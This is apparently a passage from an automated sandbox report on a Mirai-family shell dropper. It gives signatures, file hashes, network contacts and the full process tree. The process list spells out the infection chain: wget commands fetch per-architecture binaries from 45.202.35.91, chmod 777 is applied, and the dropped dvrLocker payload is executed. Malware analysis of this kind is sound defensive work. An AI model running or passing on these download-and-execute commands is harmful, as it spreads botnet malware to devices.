N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh N/A

Processes

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/102/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/110/exe]

/bin/ls

[ls -l /proc/112/exe]

/bin/ls

[ls -l /proc/113/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/141/exe]

/bin/ls

[ls -l /proc/142/exe]

/bin/ls

[ls -l /proc/145/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/150/exe]

/bin/ls

[ls -l /proc/156/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/212/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/272/exe]

/bin/ls

[ls -l /proc/275/exe]

/bin/ls

[ls -l /proc/276/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/287/exe]

/bin/ls

[ls -l /proc/289/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/306/exe]

/bin/ls

[ls -l /proc/307/exe]

/bin/ls

[ls -l /proc/316/exe]

/bin/ls

[ls -l /proc/356/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/41/exe]

/bin/ls

[ls -l /proc/42/exe]

/bin/ls

[ls -l /proc/43/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/594/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/611/exe]

/bin/ls

[ls -l /proc/612/exe]

/bin/ls

[ls -l /proc/614/exe]

/bin/ls

[ls -l /proc/615/exe]

/bin/ls

[ls -l /proc/646/exe]

/bin/ls

[ls -l /proc/652/exe]

/bin/ls

[ls -l /proc/653/exe]

/bin/ls

[ls -l /proc/655/exe]

/bin/ls

[ls -l /proc/657/exe]

/bin/ls

[ls -l /proc/658/exe]

/bin/ls

[ls -l /proc/659/exe]

/bin/ls

[ls -l /proc/660/exe]

/bin/ls

[ls -l /proc/661/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp

Files

memory/826-1-0xb6786000-0xb6797044-memory.dmp

/tmp/lib/dvrLocker

MD5 bb9275394716c60d1941432c7085ca13
SHA1 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

memory/917-2-0xb6720000-0xb6731044-memory.dmp

memory/927-3-0xb6776000-0xb6787044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 03:32

Reported

2024-11-09 03:34

Platform

debian9-mipsbe-20240729-en

Max time kernel

26s

Max time network

27s

Command Line

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh N/A

Processes

/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh

[/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/109/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/125/exe]

/bin/ls

[ls -l /proc/126/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/155/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/160/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/179/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/241/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/328/exe]

/bin/ls

[ls -l /proc/329/exe]

/bin/ls

[ls -l /proc/332/exe]

/bin/ls

[ls -l /proc/334/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/361/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/377/exe]

/bin/ls

[ls -l /proc/380/exe]

/bin/ls

[ls -l /proc/385/exe]

/bin/ls

[ls -l /proc/388/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/434/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/675/exe]

/bin/ls

[ls -l /proc/678/exe]

/bin/ls

[ls -l /proc/68/exe]

/bin/ls

[ls -l /proc/680/exe]

/bin/ls

[ls -l /proc/684/exe]

/bin/ls

[ls -l /proc/685/exe]

/bin/ls

[ls -l /proc/69/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/701/exe]

/bin/ls

[ls -l /proc/702/exe]

/bin/ls

[ls -l /proc/704/exe]

/bin/ls

[ls -l /proc/706/exe]

/bin/ls

[ls -l /proc/707/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/709/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/75/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm7]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/tarm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm6]

/usr/bin/wget

[wget http://45.202.35.91/tmpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmpsl]

/usr/bin/wget

[wget http://45.202.35.91/tmips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tmips]

/usr/bin/wget

[wget http://45.202.35.91/tarm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm]

/usr/bin/wget

[wget http://45.202.35.91/tarm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tarm5]

/usr/bin/wget

[wget http://45.202.35.91/tppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[/bin/sh ./dvrLocker tplink.new]

/bin/rm

[rm -rf tppc]

/usr/bin/wget

[wget http://45.202.35.91/tarm7 -O -]

